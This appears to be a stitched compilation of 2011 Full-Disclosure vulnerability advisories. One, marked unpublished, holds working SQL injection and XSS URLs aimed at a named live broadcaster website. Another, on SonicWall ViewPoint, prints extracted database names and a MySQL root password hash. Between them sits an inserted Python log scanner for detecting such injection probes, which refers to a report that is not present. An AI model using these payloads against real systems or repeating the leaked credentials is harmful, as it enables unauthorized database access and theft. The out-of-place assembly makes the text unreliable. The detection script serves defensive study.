2011-10-04: Public or Non-Public Disclosure [FULL RELEASE]

Status:
=======
Unpublished

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
Multiple remote SQL Injection vulnerabilities are detected on Prosiebens Tvtotal vendor website. Remote attackers can inject/execute own sql statements over the vulnerable modules on the affected dbms. Successful exploitation can result in server database management system compromise.

Vulnerable Module(s):
[+] Player - Index
[+] Videos Listing
[+] Community Profiles

Vulnerable Param(s):
[+] ?list=tag&tag=stefan_raab&tagId=
[+] ?contentId=
[+] ?u=

Pictures:
../1.png
../2.png
../

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers.
For demonstration or reproduce ...

1.1
URL: http://tvtotal.prosieben.de
PATH: /tvtotal/videos/player/
File: index.html
Para: ?contentId=

http://tvtotal.prosieben.de/tvtotal/videos/player/index.html?contentId=-42136+union+select+1,2,3,4,5,6,
7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,version(),24,25,26,27,28,29,30,31,32,33,34,35,36--+

1.2
http://tvtotal.prosieben.de/tvtotal/suche/?query=;<IFRAME SRC=javascript:alert('X4lt');></IFRAME>&x=13&y=18

2.1
URL: http://tvtotal.prosieben.de
PATH: /tvtotal/videos/
File: index.html
Para: ?list=tag&tag=stefan_raab&tagId='

http://tvtotal.prosieben.de/tvtotal/videos/index.html?list=tag&tag=stefan_raab&tagId=18 and 1=2--

3.1
URL: http://tvtotal.prosieben.de
PATH: /tvtotal/community/forum/
File: account.php
Para: ?u=-1'

http://tvtotal.prosieben.de/tvtotal/community/forum/account.php?u=-1 order by 1--

Risk:
=====
The security risk of the sql injection vulnerabilities is estimated as critical.

Credits:
========
Vulnerability Research Laboratory

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2011 | Vulnerability-Lab

Comment:
========
Thanks for the free tickets to tvtotal ;) by f0x

--
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
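As an added, defender-side example that is not part of any advisory on this list: the proof-of-concept requests in the Canadian ISP and Prosieben reports above share a few shapes that are easy to match in web server access logs, namely a UNION SELECT with an enumerated column list and version()/concat_ws() probes, an "and 1=2--" tautology and an "order by N--" column-count probe. The Python script below decodes the query string of each request line and tags those indicators, and it also flags information_schema enumeration and subselects, which is what a blind-injection extraction leaves behind. The log lines, client addresses, hostnames and paths are constructed placeholders, not the affected sites, and the signature list is an assumption about which patterns are worth alerting on, not a vendor rule set.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache combined-format sample lines (not from any advisory).
# Paths and hosts are placeholders; the payload shapes mirror the advisories.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Sep/2011:10:00:01 +0200] "GET /cgi-bin/search.cgi?f=ShowDetail&id=19 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [26/Sep/2011:10:00:02 +0200] "GET /cgi-bin/search.cgi?f=ShowDetail&id=19+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,concat_ws%280x3a3a,user%28%29,database%28%29,version%28%29%29,12-- HTTP/1.1" 200 6144 "-" "Mozilla/5.0"
10.0.0.9 - - [26/Sep/2011:10:00:03 +0200] "GET /videos/index.html?list=tag&tag=stefan_raab&tagId=18%20and%201=2-- HTTP/1.1" 200 320 "-" "curl/7.21"
10.0.0.9 - - [26/Sep/2011:10:00:04 +0200] "GET /forum/account.php?u=-1%20order%20by%201-- HTTP/1.1" 500 120 "-" "curl/7.21"
10.0.0.11 - - [26/Sep/2011:10:00:05 +0200] "GET /reports/scheduleProps.jsp?scheduleID=1%20and%20(select%20schema_name%20from%20information_schema.schemata%20limit%202,1)='x' HTTP/1.1" 200 900 "-" "Mozilla/5.0"
10.0.0.12 - - [26/Sep/2011:10:00:06 +0200] "GET /videos/index.html?list=tag&tag=union%20station HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
"""

# Request-line parser for the combined log format: client, timestamp, method,
# target (path + query) and status code are all we need here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicator signatures, evaluated in this order against the decoded query
# string. The last line ("union station") shows why a bare keyword is not
# enough: each rule needs SQL structure around the keyword.
SIGNATURES = [
    ("union-select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("subquery", re.compile(r"\(\s*select\b", re.I)),
    ("sql-function-probe",
     re.compile(r"\b(?:version|user|database|concat_ws|concat)\s*\(", re.I)),
    ("boolean-tautology", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("schema-enumeration", re.compile(r"\binformation_schema\.", re.I)),
    ("comment-terminator", re.compile(r"(?:--|#|/\*)\s*$")),
]


def decode_query(target: str) -> str:
    """Return the query string of a request target, percent-decoded until
    stable so that double-encoded payloads are normalised as well."""
    query = urlsplit(target).query
    for _ in range(3):
        decoded = unquote_plus(query)  # also turns '+' into a space
        if decoded == query:
            break
        query = decoded
    return query


def classify(target: str) -> List[str]:
    """Names of every signature that matches the decoded query string."""
    query = decode_query(target)
    return [name for name, rx in SIGNATURES if rx.search(query)]


def scan_log(text: str) -> List[Dict]:
    """Parse each access-log line and keep the ones with at least one hit."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than crash a log pipeline
        hits = classify(m["target"])
        if hits:
            findings.append({
                "ip": m["ip"],
                "status": int(m["status"]),
                "target": m["target"],
                "indicators": hits,
            })
    return findings


def hits_per_source(findings: List[Dict]) -> Dict[str, int]:
    """Count flagged requests per client address, for a quick triage view."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f'{f["ip"]:<10} {f["status"]} {", ".join(f["indicators"])}')
    print(hits_per_source(found))
```

The decoded query string is matched rather than the raw one because the PoCs in these reports arrive with `+` for spaces and `%28`/`%29` for parentheses; matching the raw line would miss them. A 500 next to an `order by` probe, as on the fourth sample line, is worth a closer look than the same probe answered with a 200, which is why the status code is carried into each finding.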
[Full-disclosure] SonicWall Viewpoint v6.0 SP2 - SQL Injection Vulnerability
Title:
======
SonicWall Viewpoint v6.0 SP2 - SQL Injection Vulnerability

Date:
=====
2011-10-01

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=196

VL-ID:
======
196

Introduction:
=============
SonicWALL® ViewPoint™ is a user-friendly, web-based reporting tool that fully supports and extends SonicWALL's security products and services. It can be deployed flexibly as software or as a virtual appliance. Comprehensive reporting functions give administrators immediate insight into the health, performance and security of their network. With its customizable overview display and a wide range of historical reports, SonicWALL ViewPoint helps organizations of all sizes monitor network usage and security activity and view web usage.

(Copy of the Vendor Homepage: http://www.sonicwall.com/de/Centralized_Management_and_Reporting.html)

Abstract:
=========
Vulnerability-Lab Team discovered a remote exploitable blind sql injection vulnerability on Sonicwalls Viewpoint v6.0 SP2.

Report-Timeline:
================
2011-06-16: Vendor Notification
2011-09-21: Vendor Response/Feedback
2011-10-01: Vendor Fix/Patch
2011-10-02: Public or Non-Public Disclosure

Status:
=======
Published

Affected Products:
==================
SonicWall
Product: ViewPoint Application v6.0 SP2

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
A remote sql injection vulnerability is detected on the famous Sonicwall Viewpoint Application v6.x. The vulnerability allows an attacker to inject/execute (pre-auth) own sql statements. The successful exploitation of the vulnerability can lead to unauthorized database access.
Notice: The file is not just located on viewpoint ;)

Vulnerable Modules(SQL):
[+] Schedule Reports (pre auth)

Pictures:
../sql1.png
../sql2.png

Example URL:
https://gms.xxx.com/sgms/reports/scheduledreports/configure/scheduleProps.jsp?scheduleID=

--- SQL Log ---
select @@version = 5.0.83-enterprise-nt
select user() = vpuser@localhost
select @@datadir = C://GMSVP//MySQL//data//
SELECT count(schema_name) FROM information_schema.schemata = 43
SELECT schema_name FROM information_schema.schemata limit 0,1 = information_schema
SELECT schema_name FROM information_schema.schemata limit 1,1 = mysql
SELECT schema_name FROM information_schema.schemata limit 2,1 = rawsyslogdb_20090905
SELECT schema_name FROM information_schema.schemata limit 3,1 = rawsyslogdb_20090906
SELECT schema_name FROM information_schema.schemata limit 4,1 = rawsyslogdb_20090907
SELECT schema_name FROM information_schema.schemata limit 10,1 = rawsyslogdb_20100223
SELECT schema_name FROM information_schema.schemata limit 20,1 = rawsyslogdb_20100305
SELECT schema_name FROM information_schema.schemata limit 30,1 = rawsyslogdb_20100315
SELECT schema_name FROM information_schema.schemata limit 37,1 = rawsyslogdb_20100322
SELECT schema_name FROM information_schema.schemata limit 39,1 = rawsyslogdb_20100324
SELECT schema_name FROM information_schema.schemata limit 40,1 = sgmsdb
SELECT schema_name FROM information_schema.schemata limit 41,1 = sgmsdb_archive
SELECT schema_name FROM information_schema.schemata limit 42,1 = test

+----------------------+
| Databases            |
+----------------------+
| mysql                |
| rawsyslogdb_20090905 |
| rawsyslogdb_20090906 |
| rawsyslogdb_20090907 |
| rawsyslogdb_20090926 |
| rawsyslogdb_20090927 |
| rawsyslogdb_20090928 |
| rawsyslogdb_20090929 |
| rawsyslogdb_20090930 |
| rawsyslogdb_20100225 |
| rawsyslogdb_20100226 |
| rawsyslogdb_20100227 |
| rawsyslogdb_20100228 |
| rawsyslogdb_20100301 |
| rawsyslogdb_20100302 |
| rawsyslogdb_20100303 |
| rawsyslogdb_20100304 |
| rawsyslogdb_20100305 |
| rawsyslogdb_20100306 |
| rawsyslogdb_20100307 |
| rawsyslogdb_20100308 |
| rawsyslogdb_20100309 |
| rawsyslogdb_20100310 |
| rawsyslogdb_20100311 |
| rawsyslogdb_20100312 |
| rawsyslogdb_20100313 |
| rawsyslogdb_20100314 |
| rawsyslogdb_20100315 |
| rawsyslogdb_20100316 |
| rawsyslogdb_20100317 |
| rawsyslogdb_20100318 |
| rawsyslogdb_20100319 |
| rawsyslogdb_20100320 |
| rawsyslogdb_20100321 |
| rawsyslogdb_20100322 |
| rawsyslogdb_20100323 |
| rawsyslogdb_20100324 |
| rawsyslogdb_20100325 |
| rawsyslogdb_20100326 |
| sgmsdb               |
| sgmsdb_archive       |
| test                 |
+----------------------+

SELECT concat(host,0x3a,user,0x3a,password) FROM mysql.user limit 0,1 = localhost:root:*50F99C5E85A49EF12C936A17C978C626B9D2BA98
SELECT concat(host,0x3a,user,0x3a,password) FROM mysql.user limit 1,1 = 127.0.0.1:root:
SELECT concat(host,0x3a,user,0x3a,password) FROM mysql.user limit 2,1 =